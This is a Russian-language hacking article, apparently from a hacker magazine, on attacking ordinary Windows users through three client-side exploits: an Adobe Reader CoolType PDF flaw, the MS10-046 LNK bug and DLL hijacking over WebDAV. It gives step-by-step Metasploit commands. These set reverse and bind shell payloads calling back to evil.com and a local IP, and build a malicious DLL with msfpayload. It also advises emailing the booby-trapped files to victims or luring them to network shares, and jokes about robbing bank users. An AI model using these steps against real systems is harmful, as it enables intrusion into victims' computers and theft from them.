Атакуем простых юзеров, используя client-side-сплойты
Автор: Zer0Set 03.03.2018 12:33
Компьютеры теперь везде и вся. Несчастных юзеров полным-полно. Почему несчастных? Да потому что во многом они стали основной целью для «хакерских атак» :). Особенно с развитием всяких систем переводов, интернет-банкинга и других видов электронных денег. Теперь снять профит с обычного юзера – не проблема. И это уже не считая классики типа спама, ботнетов, DoS’ов, кражи конфиденциально информации. Антивирусы, фаеры, IDS’ы, системы обновления ПО, сэндбоксы спасают только небольшую толпу продвинутых юзеров/фирм, так как их надо и настроить, и правильно реагировать на угрозы, и купить само ПО. В итоге имеем широкий выбор из миллионов менеджеров/бухгалтеров для «работы» с ними :).
А тут еще и реально критические уязвимости от таких контор, как Microsoft и Adobe, чье ПО является де-факто стандартом по миру. Да, в этом смысле лето было богатым!
В качестве примера я приведу три сплоита: Adobe Acrobat PDF Cooltype Sing (версии
Как ни странно, все примеры реализованы с помощью Metasploit Framework. Тут надо отдать должное создателям MSF – они чрезвычайно быстро стали добавлять сплоиты к самым массовым критическим уязвимостям. Некоторые реализации уязвимостей и вовсе появляются сразу в MSF, без сторонних PoC’ов. Все три перечисленные уязвимости были 0-day, когда попали в MSF. Сейчас уже есть кое-какие патчи, но вернемся к делу.
1) Adobe Acrobat PDF Cooltype Sing. Adobe этим летом дал миру несколько суровых дыр. Это одна из них. Заходим в msfconsole и:
Выбираем сплоит:
msf > use exploit/windows/fileformat/adobe_cooltype_sing
Задаем имя файла:
msf > set FILENAME xakep_ubileinyi_vypusk.pdf
Куда сохраняем? В home:
msf > set OUTPUTPATH ~
Выбираем нагрузку и ее настройки:
msf > set PAYLOAD windows/shell/reverse_tcp
msf > set LHOST evil.com
msf > set LPORT 80
Теперь на наш evil.com вешаем netcat, например, и посылаем жертве файлик по почте. Простой реверсовый шелл нужен, во-первых, чтобы обойти NAT, файер, а во-вторых, чтобы не привязываться к процессу (чтобы соединение не оборвалось при закрытии Acrobat Reader’а).
Есть аналогичный сплоит, но проводящий атаку через браузер и Adobe’овский плагин к нему – exploit/windows/browser/adobe_cooltype_sing.
2) MS LNK сплоит (MS10-046). Сплоит из разряда фич :)
Выбираем сплоит:
msf >use windows/browser/ms10_046_shortcut_icon_dllloader
Настраиваем пэйлоад:
msf >set PAYLOAD windows/meterpreter/reverse_tcp
msf >set LHOST 192.168.0.101
По сути, сплоит поднимает WebDAV и кидает туда ярлыки. В результате либо даем бедному пользователю полученную ссылку, либо делаем ярлычок на ресурс. То есть сплоит из локального стал удаленным (через шару и WebDAV). Павним бедного юзера – ему вряд ли что-то поможет :). Злую DLL’ку для этого и следующего сплоита можно создать и ручками. Ярлычок, понятное дело, тоже.
$msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.101 D > evil.dll
Где
- windows/meterpreter/reverse_tcp – название нагрузки,
- LHOST=192.168.0.101 – настройки
- D – указываем, что создаем DLL’ку;
- evil.dll – имя итогового файла.
3) MS DLL Hijacking
Это очень забавная вещь! С ее помощью мы фактически можем «превратить» любой миролюбивый формат файла во что-то злое. Пришлют тебе файлы с какой-нибудь презентацией или чертежами AutoCAD’а, например. А среди них какая-то библиотечка валяется. Бывает ведь. Ты, конечно же, запустишь сам чертеж, а тут – бац! – и у тебя бэкдор. Хорошее дело!
Подробное описание «почему и зачем так» смотри на следующей странице у Алексея Синцова :).
А теперь – немного практики.
Выбираем сплоит:
msf > use windows/browser/webdav_dll_hijacker
Задаем имя файлов:
msf > set BASENAME policy
Задаем расширение файла:
msf > set EXTENSIONS ppt
Имя для шары:
msf > set SHARENAME docs
Нагрузка:
msf > set PAYLOAD windows/meterpreter/bind_tcp
После этого либо впариваем жертве ссылку на шару – \\192.168.0.101\docs\, либо на HTTP-сервак – http://192.168.0.101:80. Жертва открывает файлик – мы получаем шелл. Честный обмен :).
Опять же, по сути, локальная уязвимость превратилась в удаленную за счет шары и WebDAV. Вот такими тремя client-site багами мы можем положить на лопатки все версии Windows, от XP до 7. Антивири и файеры – тоже не помеха при небольших доработках методов :).